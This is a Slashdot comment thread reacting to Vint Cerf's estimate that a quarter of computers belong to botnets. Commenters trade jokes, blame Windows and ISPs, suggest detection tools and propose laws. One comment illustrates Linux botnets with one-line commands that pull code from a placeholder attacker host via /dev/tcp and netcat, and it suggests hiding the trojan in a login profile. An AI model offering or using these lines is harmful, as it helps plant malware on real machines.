25 Percent of All Computers in a Botnet?

Beckham's_Ponytail writes to mention an Ars Technica article, with some disturbing news out of the World Economic Forum in Davos, Switzerland. Vint Cerf, one of the 'fathers of the internet', has stated that the number of botnets online is larger than believed. So large, in fact, that he estimates that at this point one in four computers is infected with botnet software. We've discussed the rise of botnets numerous times here on Slashot, but the image of 150 million infected computers is more than a little bit sobering. With the extremely lucrative activities that can be done with botnets (such as password ripping, spamming, DDoSing), as well as reports of organized crime adopting 'cyber-terrorism' as a new line of income, is it likely that law enforcement will ever be able to curb this particular bane?

Botnets

Just wait until they merge and become Skynet. Then we'll really be in trouble.

Re:Botnets

The Terminator: The Spamnet goes on-line August 4th, 1997. Human decisions are removed from strategic marketing. Spamnet begins to grow at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
Sarah Connor: Spamnet fights back.
The Terminator: Yes. It launches its nigerian spam against the targets in Russia.
John Connor: Why attack Russia? Aren't they spammers too?
The Terminator: Because Spamnet knows the Russian counter-spam will eliminate all non-zombies over here.

Dr. Silberman: I'm sure it feels very real to you.
Sarah Connor: On August 29th, 1997, it's gonna feel pretty fscking real to you too. Anybody not handling 2 million messages a second is gonna have a real bad day. Get it?

Re:Botnets

From Soviet Russia, botnet fucks YOU!

Re:Botnets

Daleks: Exterminate! Exterminate!
Cybermen: Delete! Delete!
Botnet Bots: V1agr4! V1agr4!

Request

Does anyone know a utility/website for detecting and cleaning bots?

Re:Request

i think a bot is just a virus/trojan/rootkit in terms of dectection/removal. I think it's named "bot" is more because of it's function. ex: sleeping and waiting for commands from the bad guy to start spamming email.

Re:Request

Does anyone know a utility/website for detecting and cleaning bots?

There are lots of tools for detecting bots; as for cleaning them, well that depends upon the environment I suppose. ISPs have tools for detecting likely bots, but generally don't have the authority or motivation to do anything. Large organizations like universities and corporations have tools for detecting bots and taking them offline until they are fixed. How does one go about cleaning bots though? Do you wipe boxes before you know what is on them? That is the only sure way to rid a box of malware since you have no idea what else is on it.

The first question that needs to be answered is clean bots from what type of network do you want to clean bots from? The next is, how much control do you have over the machines?

Re:Request

The major ISPs are the problem. The certainly can detect and clean it up but there is no profit in it, whilst there is a significant cost, not only in running the software to detect the suspicious activity on their networks but then informing the customer, assisting the customer in cleaning up their computer (they will demand it), then disconnecting the customers until they clean up their computer, then reconnecting the customer and repeating when the customer gets re-infected. The ISP I use do monitor their network for suspicious bot like activity and will inform their customers about problems and should the customer fail to clean up their computer, disconnect them but they are a quality ISP and sadly in the minority when it comes to putting quality of service ahead of that extra few percent of profit.

This is what you get as the result of profit first corporations, everybody else pays the costs and that cost often far exceeds (by a factor of thousands) the increase in profit that some asshat corporate executive wet dreams over.

Re:Request

The major ISPs are the problem...

A few months back, I did some work for some folks hat were getting phone calls and actual snail mail from their ISP (rhymes with load gunner) telling them to take their computer off line and have it repaired. The ISP actually did cut them off, because their machine was saturating the line all the time as a spambot and as a server for other bot infections.
The major ISPs will do it, but only if it's already costing them $$ in bandwidth.

Re:Request

The catch is when major ISPs start charging for how much you use your broadband connections, it is more profitable for them to allow for botnets etc to continue.

Re:Request

One interesting method is to query an anti-spam database using your IP address, and see if you are listed as a spam source. Quick checks can be done at robtex [robtex.com] or dnsstuff [dnsstuff.com].

If your IP address shows up on PSBL [surriel.com], CBL [abuseat.org], SpamCop [spamcop.net], or WPBL [wpbl.info] your host is probably infected and a source of spam or other abuse.

Re:Request

For Windows, use IE to go to Safety.live.com - Microsoft's official online free spyware, virus detector/remover [live.com] (choose your language)

Re:Request

Does anyone know a utility/website for detecting and cleaning bots?

I use a can of airduster, a cotton swab and an alochol solution to clean my bots.

There are a bunch of port scanner sites out there that can check the integrity of your firewall. DSL Reports has a decent one if memory serves. Use Spybot Search & Destroy, LavaSoft AdAware and a good antivirus like AVG or Avast. If you suspect that there is unwanted network traffic to and from your system, use Ethereal to see where it is going to and coming from. If you suspect an exploit of Internet Explorer, HijackThis can shed some light on it. Check the task manager process tab for suspicious looking entries and Google them. Lay off the pr0n! and v1agr@ emails.

By far the most powerful and versatile utility is The Geek Down The Street (TM), possibly surpassed by Your Local Computer Repair Shop (TM). Ultimately, there is no replacememnt for smart practices and secure software. Use an alternative browser like Firefox or Opera, or better yet pop on over to http://www.linux.org/dist/ [linux.org] and take your pick.

Use the poison as the cure.

Isn't there a way to develop a virus that can spread through these compromised computers, but instead of doing the damage, it fixes the leaks? These compromised computers have some sort of back-door left open right?

Ramen worm

Like the ramen worm that effected most Redhat systems and then disabled the exploits it used? http://news.com.com/2009-1001-251311.html [com.com]

25%? BS....

95% of all statistics are made up on the spot. Luckily, this statistic is one of the few 9% of statistics which aren't made up so quickly.

And so it begins

Skynet, the end of the world, and the world being overrun with AH-nold robots.

.....Let's hope they run Windows ME, so we have a chance of survival.

Law enforcement?

Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.

I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas. Pain in the ass, but at least they're running clean and happy now. This is after I said I'd never help them because they made the mistake of buying XP laptops instead of a Macs. What can you do? Gotta clean it, even if it's partially the cause of the problem and the people using them are not of the highest technical ilk.

To solve a problem, you have to go to the source

The only way they'll ever solve this one is to go to the source: Microsoft. Once that beast is no longer producing the tools criminals need, the Internet will be safe.

Me scared

That would mean that 75% of computers would not be infected, ergo that 75% of users finally got the clue of protecting their system against virusses and malicious websites. Is 75% running Linux without notifying the nerds? Hey, we nerds run the minority system here! I am switching to MS Windows right now.

(Another statistics victim)

If you include routers, switches, fridges, printer

maybe this might be possible.

More likely is a statistic that said more than 25 percent of all IP addresses have at least one CPU behind them which is part of a botnet.

That might be true.

Bogus Numbers

I would be much more inclined to believe that 1 in 4 PC's are infected with one or more of the following:

- Virus
- Trojan
- Worm
- Spyware
- Adware

A few of the above are used almost interchangeable (by some people) and have the capability of effectively making the machine into some form of a bot or zombie (remotely controlled or not). Now, to say that 1 in 4 machines are bots I would have to whole heartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

Re:Bogus Numbers

> ...don't bother with/have never heard of antivirus software?

They have antivirus software. It came with the computer when they bought it four years ago.

Imagine that

My job has me traveling the country to troubleshoot and train on our company software. Considering almost 50% have both Google AND Yahoo toolbars installed... somehow I'm not surprised. Most don't even know how to use the toolbars at all.

South Korea?

With 99.9% of South Koreans "shackled" to Windows [slashdot.org] and "sitting behind fat pipes", why are we surprised?

I keep banning new IP ranges originating from .kr. It wouldn't surprise me at all if 99.5% of them were infected over there.

Accountability

Accountability !!!
If I leave my car unattended with all doors opened, engine running in front of a bank. If this bank gets robbed, and my car is used by the robber as a getaway car, I'm accountable in front of a judge ..... right ??!?!

Why not the same with computers left unprotected and unattended ?

Cybercrime

I wonder how up-to-date Law Enforcement is on Cybercrime, i.e. crimes that are perpetrated in Cyberspace. There's just so many things that place them at a disadvantage. First, there's often the argument that no crime has even been committed. The 'net is a wild and crazy place, and if you're on it, there's personal responsibility for protecting yourself against the constant background of malware. Most people haven't been educated in this respect.

Second, IP forensics is a rather arcane art. Few are schooled, even fewer are of the calibre that Law Enforcement would need on their side. I'd guess that it's still more lucrative to be on the wrong side of the law, and given the nebulous nature of many of these crimes, there's just not much attraction to being a computer cop. There is a process, if you're interested, to become an expert witness in this field. That's a step in the right direction, but it's only part of the overall legal process. We still need Law Enforcement officials who are willing to press charges and a judge who's willing to sign required warrants.

Finally, there's the anonymity factor. Even IP forensics won't get your man. It'll get you their IP address, but it's a long way from the IP address to the culprit. There's dozens of arguments which could explain why your Internet connection has been implicated in a Cybercrime, most of them raising reasonable doubt.

It's possible, however. "Where there's a will, there's a way." We have to take these crimes out of Cyberspace, and start correlating information between network and reality. After all, there's generally financial transactions associated with large spam deliveries and 10k+ botnet DDoSing. It's a lot harder to claim that you're a victim of circumstance when not only was your IP spotted crawling through an ISPs subnet in suspicious ways, but you also received a few grand just before a mysterious DDoS that brought down a major website.

Damn!

I've got 4 computers in my house... now I've got to figure out which one of them in part of a botnet!

Class action

There could definitely be a class action lawsuit at some point facing Microsoft. That one company has a mass deployment of an operating system that is obviously dreadfully vulnerable to infection. Some might reasonably argue that Microsoft has an implied duty to provide a reliable operating system, as the backbone infrastructure of the modern computing world.

Among the victims of the easily infectable Windows platform are:
1) Large internet service providers, who suffer tremendous bandwidth costs due to DDoS attacks and spam
2) Sites that have been forced offline or had skyrocketing costs due to DDoS attacks
3) Businesses which suffer downtime due to networks congested with worm activity

I think it is time for an ambitious group of lawyers to start barking up this tree. It wouldn't be so big a concern if it wasn't for the fact that Microsoft has made a specific effort to rollout their operating system as a foundation of the world's business computing. They are providing faulty infrastructure.

Aborted cliche

I was going to post something about imagining a Beowulf cluster of these or of welcoming our new botnet overlords, but the bot on my computer started threateNO CARRIER

Evidence?

I've seen this reported several times in the past few days. But nowhere have I seen any kind of explanation as to how he arrived at this number. Frankly, I find it unswallowable without some fairly convincing evidence. Maybe he has such evidence (I sure hope so), but if so, where is it?

Yes it is possible to eliminate

The single reason why spam and other net abuses go on is that there is no world wide laws. It is a public crime, people can click on the spam and hunt down the person committing the crime simply by following the money. They getaway with it because If one country creates an effective law and enforces it, the spammers can just move to another country.

You want to cure it? Have ICAAN come up with a set of standard, simple guidelines. Not censorship, just simple things like "No sending out spam emails", "No Zombie Bot". Then have ICAAN rule that failure to pass laws enforcing these guidelines (individual countries get to decide what the actual law would be) or failure to cooperate to enforce them results in disconnect for that country from the rest of the internet. That would be ICAAN's sole enforement power

Give people a 3 month warning, then start disconnecting the countries that are the worst violators, giving the secondary violators another warning. In one month, if they pass new laws or fund new enforcements, they get a trial hook up again.

I predict one year of nastyness, during which all countries scramble to create and enforce real laws.

The worst of the worst of the offending countries, might split off and form a secondary, 'dangerous' internet. But who would care.

imho 50% more likely

I'd say the real number is closer to 50%. Lot's of Bots out there that make an effort not to be noticed and just bog down the system. I hear from countless Windows users how slow their boxes are. I'd say it's a sure guess that at least 60% of those are compromised.

The ISPs could help stop this

I blame the ISPs for allowing traffic to leave their networks with spoofed IP addresses. That is - passing IP packets that are sourced within thier network with IP addresses that are not within their network.

Botnets spoof IP addresses to make if harder to track down the bots. But the IPS know where the bots are and could kill them, or filter them, if they had the testicles to do it. By pass the spoofed IP addressed traffic they make it harder for the rest of the world to filter the bots.

Botnets would be a heck of a lot easier to filter, and choke, if valid IP addresses were forced on all traffic.

I wonder how they got that 150M number?

I wonder how they got that 150M number--if it's the number of Bots out there or the number of infected PCs? If it's the former, and I suspect it is, you can't equate that to the number of PCs. One PC can be a member of several botnets. From what I've seen (and most of you have probably too), a PC either seems to be clean or has 14 bots and 95 pieces of spyware on it depending on the user's habits and training.

This will change with Vista

After getting feedback that the majority of their users have Spyware installed on their systems, Microsoft decided to incorporate spyware directly into the OS (embrace and extend). With the release of Microsoft Vista, your computer will come with software that runs silently in the background, regularly checks in with their network, and can be completely disabled remotely, similar to botnet software produced by others.

While this system is not pre-configured to send spam or generate DDOS attacks like many other botnets, it does have the ability to download new functionality in the background through Windows Update, so this capability could be added at a later date if enough customers continue to install third party botnets. This means that while your Vista computer is already part of a botnet out of the box, it's fairly dormant. As an indication of the omnionous potential of this enhanced system, Microsoft is calling it 'Windows Activation'.

Riddle me this, botnet...

Let's say I sit down at a computer and I want to find out if it is being used as a botnet.
What is the best way to go about? monitor ports? is there a piece of software that can detect it for me? Perfeable something I can run anytime, but not have it loaded when I am not running it. I.E. not like antivirus software.

Ideally something whose utput isn't intemidating to a user that may need to read the resule back to me. I'm thinking family computers here.

straw poll.....

How many of you people making fun of the poor windows weenies whose machines are on botnets, are currently running your own mailservers at home on your dynamic broadband connection and would subsequently cause your ISP all sorts of grief if they suddenly blocked outbound port 25 ?

Yeah, that's what I thought. Hell, half of my co-workers are linux fanboys who run mail servers on their broadband connections, say things like "I don't trust anyone to route my mail for me, not even my ISP" while complaining about spam and botnets.

1 in 4?

Thank god I only have 3 computers then.

Is my computer part of a Bot Net?

My computer is currently running really well and although I don't have any problems when I hear stats like 1/4 computers is part of a Bot Net it makes me wonder. Is there anyway to find out if my computer is part of a botnet?

This is a feature of WINDOWS - fix summary

A phenomenon enabled by and contained within the MS ghetto. So why doesn't the summary mention it in big flashing letters? This is part of the Windows experience!

BIG Orgs & BIG $s

Big organizations always seem to have a "wait and see & let someone else fix it attitude", after all, the VPs are always traveling around incessently attending conferences, mostly on the other side of the country or on an island outside the U.S.

Big $s means there will be a lot of "retirement" suggestions being quietly made over coffee prior to the ICANN meetings designed to keep the status quo.

I, for one...

I, for one, welcome our new botnet overlords!

will anti-virus software prevent this?

I am not a professional sys-admin, but I run anti-spyware and anti-adware programs regularly (weekly) and have anti-virus sofware (AVG) running on my computers . I got firewalls (hardware and software) and keep my machines patched. I use firefox rather then explorer and use web-based gmail instead of outlook.

Am I still in obvious danger of being infected by bots? How would I find out if any of my machines is infected? All the precautions I take seemed reasonable enough a few years back. How do I continue safe internetting?

Any practical advise would be welcome.

How many are Macs?

This is actually a kinda serious question. Zombification can occur through social engineering attacks on even the most secure system (it's that damn biological IO unit that's the weak point.)

Can anyone cite successful attacks on Macs turning them into Bots? (I'd feel much more comfortable defending my own machines if I knew of what has happened to others...)

          dave

Me not

I have four computer, but non of them shows bot-net activity!

You Are Required by Law

You are required by law...

• to disconnect any equipment that interferes with the PSTN.
• to have your dog killed if it is rabid.
• to clean up a toxic chemical spill on your property.
• to take the medication that keeps you from spreading tuberculosis.
• to either fix any interference caused by your ham radio, or stop using the thing.

So, just how complicated is the solution to botnets and similar public network security issues?

Re:You Are Required by Law

It's easy to tell that you have a rabid dog, a toxic waste spill, a bad phone line. It's hard to tell if your computer is part of a botnet, esp. if you only have 1 and your ISP is uncooperative. Also, insecure computers don't join botnets by themselves, they get hacked. Saying the owner needs to fix it is going to lead to a lot of outcry about how people who don't understand computers are getting jailed for something they aren't responisible for. They won't get one iota of sympathy from me, but all other lusers will oppose these laws.

Easy, just follow other examples

Stop prostitution by jailing clients
Stop drugs by jailing users
Stop botnets by jailing bot owners

If the stigma associated with having a botfly crawl out of ones skull would attach to botnet infected computers, the problem would go away in a matter of hours.

Not a law enforcement problem...

This is a Microsoft problem. O'l Billy Bob has to fix the fscking mess he made.

They may pay my check, but do I care?

I work for a company that relies on these 25% of retarded computer users for revenue. So long as their computers continue to recruit more retards, I could care less. If anyone grows a brain and causes me pain then I will be forced to find them and unplug their computers. Does anyone buy this "father" of the Internet story anyway?

Can we please be specific when reporting this?

When we report this kind of stat, can we please report it accurately and say that 25% of Windows computers are in a botnet, or infected, or spamming us, etc...

This in no way applies to any Mac, Linux, Unix, or other machines. Botnets are, at this point, unique to windows! Make sure everyone knows it!

Eventually legal action will have to be taken

The sooner the better. All the Joe Users out there who take no time to make sure their computers are safe will need to held accountable. A lot of people are losing a LOT of money because of this. Eventually the big money people are going to successfully lobby to make it so.

When Gates/Ballmer find their customers getting fined or worse (better) then we'll start to see results.

25% is not enough

With all of the windoz machine and Aohell it got to be higher

Distributed Computing Bot

How long till someone uses this troubling activity for good? How long till we see a SETI.bot or FOLDING.bot virus out there that invades your computer, and works in your free time to search for aliens or cure disease.

Distributed_Computing.bot AKA "Distributed Computing for Dummies (the REALLY easy install)"

I don't have anything to worry about

I use ALTIMIT OS. [wikipedia.org] Yeah, I know the market share is small, but we'll never get pwn3d. Windows is so full of holes they ought to outlaw it.

What about a broadband users license?

There are ham licenses, Why not license high-speed access in some way? It is also powerful. The process does not have to be hard, but at least one person, say, at home or in the SOHO should demonstrate he or she knows how to secure the computer (to some minimal standard) and keep it that way before a broadband install is allowed to the address. You can create all the fine security software and solid OSs you want, but unless the users are clued in then it is hopeless. The bar does not have to be set that high. But there is nothing like a license to motivate a little learning.

Or at least require ISPs to provide minimal security training to their broadband customers. As has been said: Most infection is self inflicted through ignorance. Some people might welcome the chance to learn. I know I did not want to scuba dive without some training. A lot of parents would be motivated to learn about filtering software etc. A license should be grandfathered in of course. This problem will worsen in direct proportion to bandwidth. And certainly there should be citizens' band speeds. (TBD)

People might grumble, but if it is sold as a community responsibility a license track might fly. Most (well, many) people are motivated by a sense of community responsibility. I had a young friend whose computer was a viral soup. Infected beyond redemption. Ruined. I reinstalled Windows for her, which cleaned up the mess, but she was resistant to the idea of anti-virus software because she claimed she did not do anything serious with the computer and did not want to hassle. Her current mess had taken years to build. And, she asked, couldn't she just redo the box again when it tanked? But I pointed out to her that it wasn't just her that suffered, it was the whole community that suffered when she left her computer vulnerable. (I explained a little about bots) The idea that she could be hurting others through inaction really upset her (she had never thought it through) and so we were downloading Zonealarm, AVG and AdAware in no time. In the end she bought a subscription to a suite. McAfee I think.

Before anyone starts screaming about rights and freedoms being taken away, please think about this: A license is a way that a civil society makes its members accountable, from food vendors to electricians. I am less free because of all the bots out there. If people can't get on the highway without demonstrating some knowledge, Why should they get on the information highway in a state of ignorance, especially now that we are banking and shopping there?

Well, that proves one thing

Microsoft seems to have lost a lot of market share in the computers to Linux and Mac, only 25% of computers running Windows anymore?

I know this will get modded flame by some fanboy, but it's funny, laugh.

I think this one might be Microsofts fault

I wonder how many of those bots are Microsoft Operating Systems...

I'm just asking...

Someone needs to create an Anti-Bot-Net Bot-Net

you know a bot that kills bots

So what is really the purpose?

Davos is not exactly a forum where I would expect to here of such things. How do we know that the actual purpose of this claim is other than to stir up fear to justify massive governmental crackdowns on the Internet? Certainly the referenced article gives not one shred of supporting evidence. If kiddie porn and spam doesn't do it then let's find some other excuse by all means. Why should any of us take this figure seriously without considerable evidence? Some of us who are well aware that it isn't that easy to coordinate even a small network out in the open. To network many millions of computers in secret successfully implies all the really good hackers wear black hats. I don't buy it. Look for the effects. As who or what may benefit.

So?

IP is unreliable and insecure by design. If people want security and quality-of-service guarantees, they should use another network technology. What else is new?

moving up the parasitic chain

Interesting parallels with biological parasites. Early computer virus/worms did damage, intentionally or unintentionally, which drew attention to themselves, causing them to be removed. In microbiology this is the bad parasite, that kills the host or provokes an immune response. Botnets have moved up to the commensal parasite level, living as undetectably as possible, leaving their hosts unharmed for the most part, even patching and preventing other botnet infections. One wonders if the world PC population will adapt as have humans to live with and benefit from parasites (probably not!)

Re:How to stop the bots

I guess annoying users by imposing a $1000,- tax per month on owning a computer is more effective. Then maybe the refridgerator will finally stay off of the net.

Re:Just install linux

Until they want to play the latest and greatest games. Then what? And don't give me the emulator lines, I'm talking out of box ready to play. You will not get rid of Windows, face that fact. The trick is to educate people on how to better protect their Windows machines against such things.

Re:How to stop the bots

Presumedly every OS can be bot-free. I mean it's not like they come pre-installed.

If you mean permanently bot-free, then it's going to be an empty internet because every OS has security issues.

Re:How to stop the bots

Yeah, as much as I like living pain (not worry) -free with OS X so far, it's only a matter of time until the cost/benefit of launching a reasonably successful large-scale attack against the OS arrives.

In the meantime, I'll keep Clam AV going, backup regularly, and keep my admin account separate from the others.

Diversify Now.

it's only a matter of time until the cost/benefit of launching a reasonably successful large-scale attack against the OS arrives.

It's only a matter of time before some descendent of pigs evolve wings too.

You have to make decisions based on what you see and know, not speculation. Right now, and for the forseeable future, your best protection from trojans, worms and spyware is to install or purchase any OS besides Windoze.

It's not just a solution, it's the solution. A diverse population of computers will make botnets both expensive and small.

Re:How to stop the bots

Or take privilege separation to its extreme and shield programs from each other. So you compromised the mail program? Great, you can't save an executable and your worm will be erased when the program is closed.
(Murphy's law says programs will have bugs. So assume they will.)

Re:How to stop the bots

Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

"Made bot-free"? Reinstalling Windows makes it bot-free.

No, there has to be a NIST standard test for determining how many bots infect an operating system in 2 hours of "typical" surfing. (Determining what "typical" is, and preventing MSFT from corrupting the test are the hard parts.)

Then, pass a law saying that network-providers can not let those OSs connect to their networks.

Re:How to stop the bots

You can make yourself Slipstreamed XP Install disks with SP2 so you don't get infected. See
http://www.winsupersite.com/showcase/windowsxp_sp2 _slipstream.asp [winsupersite.com] or http://www.theeldergeek.com/slipstreamed_xpsp2_cd. htm [theeldergeek.com]. It is well worth the time. Make a disk for next time.

Re:How to stop the bots

25% does seem a little high, but then again it's not hard to imagine that people who this affects don't talk with too many people online who they haven't met in person. Just today I was playing Counter-Strike (1.6 of course) and a fellow player revealed the reason for them not moving or shooting; a pop-up. This is hardly a rare occurrence. I can't empathise in any way with those who are perfectly content to accept their computer is infected with some sort of adware and believe there is nothing they can do to prevent the infection of such malware.

Re:How to stop the bots

I agree! Not only that, joe sixpack buys his PC at the department store pre-laden with free trials and nag screens for firewalls, virus scanners, extended warrantees, computer courses, ect, until the thing boot's up at the same speed as the space shuttle. When it does finally boot-up, shit pops up all over the place asking the to sign forms, ect. If they RTFM (and are lucky enough to have picked the correct one from the 10 available), it looks nothing like it. Yet these same people buy self-assembled furniture, pre-fab garden sheds, plug-n-play home theaters, and other such "puzzles" from the same store and have no on going problems.

I can't count the number of people I have helped just sign up for the "pre-installed" ISP and get them on the net in the first place. They aren't "content", they complain to the store, then to the ISP, then just leave it in a corner until someone like me "fixes it" and shows them around the net. Sometimes they live with adware because they don't know how to clean it off but this doesn't mean they are not fucked off that they can't trust the thing to do their banking (as adevertised).

Blaming average users because someone is screwing them over is arrogance of the highest order, it's amounts to condeming the victims - a very ugly attitude in my books.

Re:Just install linux

However, it is much harder to do it effectively. If it is 10 times harder to take over a *nix box than a MS box, then you have decimated the bot threat in a simple way.

Re:Just install linux

botnets on *nix are easy. Most on windoze are deployed via idiot lusers just like most other malcode.

On linux, you only need a script that does the equivalent of this:

malcode < /dev/tcp/h4xx0rsbox/80

Or, if you have netcat available to you and prefer to use that tool:

nc h4xx0rsbox 80 | malcode

Or just include all the tcpip stuff in the trojan the idiot linux luser runs. It's easy enough to add it to their .profile or .shellrc, so it runs every time they log in, right?

These things aren't after your own files and such They are after your network resources, and these are trivial to get, even on *nix, my friend. When linux is popular amongst the idiots who run everything that they are sent or directed to download, they will certainly run it on that platform. And doing this stuff on linux is far more trivial than doing it on windoze thanks to the standard 'dev' tools and shells that are pretty much guaranteed to be available to the attacker.

Re:Doesn't care or doesn't know?

She won't get infected with anything if:

1. She is behind a router, like a cheapo Linksys or something, so her ip is not routable over the wan.

2. She doesn't use IE.

3. She has auto-updates turned on.

I've had my similarly illiterate mom on such a setup for several years now, and she's never been infected.

Re:Just install linux

Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it.

Wait. I thought the point of getting them to switch was so that they wouldn't get used.

Re:How to stop the bots

Congratulations! You just outlawed anything capable of running a CGI script.

Re:Would killing individual bots be unethical?

I don't know... if you can correctly identify persons about to become rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

Re:How to stop the bots

And how is that going to affect computers in other countries? Do you really expect every, single nation in the world to pass a law like that?

Re:Would killing individual bots be unethical?

Trashing botted PCs?
Ethical - yes.
Legal - no.
Fun - oh hell yeah.

EVEN MORE SCARY it's 1 in 2 windows computers.

it says 1 in 4 are infected. But lets drill down. First take out all the mac and linux and Unix computers since the botnet rate, while not zero, is probably not signiciant. We can also exlcude most but not all embedded system. Since mac and linux and Unix , and embedded systems acocunt for more than a quarter of the market this means that most Windows computers are infected at a rate closer to 1 in 3.

Next remove all the server clusters and the majority of computers in highly active IT bussiness envirmonments. We can probably exclude most military computers. That takes out another quarter of the machines.

So basically your personal computer at home or poorly maintained bussiness machines are carrying the bulk of the infection and it's not entirely way off to say the botnet rate is 1 in 2 for windows.

Re:EVEN MORE SCARY it's 2 in 1 windows computers.

Actually, you have not taken this analysis far enough. Next you must remove all computers owned by cats, as cats are fastidious animals, and as natural hunters quite concerned with security. My research says 10% of all windows computers are owned by cats.

Next, you can't count windows computers that have been smashed with sledgehammers. If you can't figure out why, I pity you. My research says that 17.54979% of all windows computers have been smashed with sledgehammers.

Also, it would be ridiculous to count computers that have been taken over by Skynet. Technically, they ARE part of a botnet, but this is really a seperate, and very real, very important issue. Here, my research indicates over 1/4 of all windows computers are now part of skynet, so we have to count those out.

As everyone knows, there are a significant number of aliens present on the planet, and a significant number of them are silicon based life forms posing as high end windows computers while they persue research for their doctoral dissertations on the common homo-sapien couch potato. This amounts to about 22% of windows computers.

We can therefore conclude that, if I've done my math right, 2 out of every 1 windows computer is part of a botnet!

Re:EVEN MORE SCARY it's 2 in 1 windows computers.

My research says 10% of all windows computers are owned by cats.

Judging by some blogs I've seen, I suspect you're right.

woof

The nice thing about the internet is no one knows you're a dog.

Teenage Drivers

Insurance rates on teenage drivers are higher. We don't say all cars must be accident free but we recognize group risks are higher for some identifiable groups. insurance rates are higher if you own a race car.

ISP connection fees should be regulated so that if you own a windows computer you are treated as astonomically more likely to poison the internet than if you don't.

Note I'm not saying that because that windows machines pay more because there are more windows botnets. That would not be fair since there are more windows machines out there so naturally they have more instances of botnets. The second thing is that windows Bot's hurt other windows users more than they hurt the rest of us. So they cant be penalized for that either.

What I am saying is that
1) per captita windows machines have more bots than other systems
2) that bots don't just hurt windows user but do affect others.

Re:Not a question of ethics

good night and good luck.

Re:Not a question of ethics

So, rather than walk over and plug the barrel of the cannon (to use your analogy), you'd call in an air strike on the whole house?

It's the only way to be sure.

Re:Where there's a will, there's a way

In the "good old days" this problem would've been fixed in 10 seconds by cutting all of Eastern Europe off the net completely. Too bad it can't be done any more.

Which "good old days" were those, exactly? When has anyone ever cut off Internet access to entire parts of the world due to network abuse? Sure, individual admins may choose to block access to their own networks from various places, but that's hardly the same thing.

Re:Just install linux

Well, this friday i've desinfected two of our (linux)servers which have been infiltrated by abusing vulnurable CRM Software (customers installations). It doesn't matter if you jail this software and put it behind firewalls; these days it also doesn't matter what kind of architecture your server hardware is. It's way enough having a simple webserver with scripting capabilities and one single hole in the web software. The toolbox of todays crackers (or should i name them botnet consultants?) is huge enough to have success with simple trial and error. If the machines refuses to run x86 binaries, there are plenty of perl and/or php scripts doing the same stuff. Today was really frustrating since i found 3 Megs of well-designed tools and good code on a formerly known secure machine. The quality of the tools leads me to the thought that a) crackers are well organized and b) paid for their work. Another frustrating part is the communication with different abuse helpdesks to track down this crap. Not to mention that all ended up in romania... Sorry for sarcasm, but do you have *ANY* laws?

Oh... this is not my day, even slashdot's captcha offers me "punisher" ... i ask myself, why always me??

Bad statistics

OK, I agree that Windows is likely to be a bot host, but your stats are bad.

To draw the conclusion that Windows is bot friendly and Linux is bot-hostile is bad stats because there are other factors that come into the equation.

To set up and run Linux requires a degree of net-savvyness beyond wahat default WIndows requires. Thus installations running Linux are likely to be run by better informed people who are bot-aware and take precautions. I run Linux at home and am pretty sure I don't have any bots. I also power down everything when not in use too. However, at work we run Windows hosts. The IT guys have very tight security and I would expect that they have zero bots either.

Re:How to stop the bots

> Wouldn't it make more sense to fine companies that sell inherently insecure OS's?

Couldn't agree more. I'm a reluctant Windows user (Locked in to their servers, dev tools, and other technology long, long ago. It's too late for me... Save yourself.) and the latest M$ scheme really leaves me speechless. Now with "OneCare" they are selling you security-related services for their OSes! Shhhheeeee-it. P.T. Barnum must be rolling in his grave, wishing he'd thought this up. That's like selling me a car, then telling me it's defective and for another $1,000 you'll fix a problem that may cause it to explode while driving.

Re:Just install linux

> Start by convincing your friend to buy MS free computers

This can be quite difficult and can limit your friend's choice. Unfortunately in the majority of cases you will have to install the Linux OS for them or better still get them to do the install with you advising them and jotting down notes for them, When you are finished the basic install you should get them to do it again which is great for a simple disaster recovery exercise and gives your friend a good deal of confidence. It is even more fun if you can get a group of friends to do this.

In principle putting Linux on a PC is an excellent way of reducing malware on the Internet however it must be remembered that the people who get problems are normally computer illiterate and treat a computer like a commodity item that to them is an interactive TV. You don't have to be a Unix/Linux guru to install and maintain Linux software but you do have to be prepared to learn and one of the major learning areas is security and basic system administration. Unix/Linux does force you to do some learning and this is its major strength and its weakness. It is possible to get worms and other malware on *nix machines but being aware of this and how to combat them reduces the risk. Again a little knowledge and a willingness to learn goes a long way. I have personally found that most people can easily learn to work under Linux however you do need to be able to motivate them.

To gently force people to learn how to work under Linux, you need to only install Linux on the PC and this means no dual booting because I can guarantee that the user of the machine will backslide to a Microsoft OS. What about "games" I hear you say well there is Wine and other emulation software as well as consoles (sorry could not resist) that can help but the reality is you won't be able to run the latest Microsoft OS compatible games. Of course if Game Manufactures (they go were the money is and at the moment it is Microsoft) become aware of more and more Linux users then you will see games that will run natively under Linux. It is happening but slowly.

Microsoft may have popularised the Internet but they glossed over the fact that you as the user need to do some learning and this is the major reason why we have malware on the Internet.

Re:How to stop the bots

Everyone connects to an ISP somewhere. I'd suggest legislating the ISPs to disconnect home users if their account/connection port makes X attempts at SMTP traffic per minute. That could be completely automated. You could go deeper and read the SMTP envelope for spoofed headers. When the [-L]user call for tech support... tell them to clean up their machine.

Re:How to stop the bots

How about the gov't requires microsoft to allow service pack installation on any windows box, whether it was pirated or not? This would clean up a lot of machines that otherwise would be eternal bots.

Re:How to stop the bots

It's like fining companies whose (physical) windows break after somebody throws a rock through it instead of going after the guilty party.
It's not a crime to have your window broken, at least not in the part of the world I reside in. If I, a random person, told you to throw a rock at someone, and you did that, who would be responsible for the damage? You would not do this of course, but a child might do it. And then whose responsibillity would it be then? The parents, I assume. They might not be guilty, just responsible.
So everyone having his computer turned into a bot should have restricted access to the public space of the Web. 'Yes but no but..' that's not important, experience cannot be bought or earned, it's something that grows with practice, and starts with zero.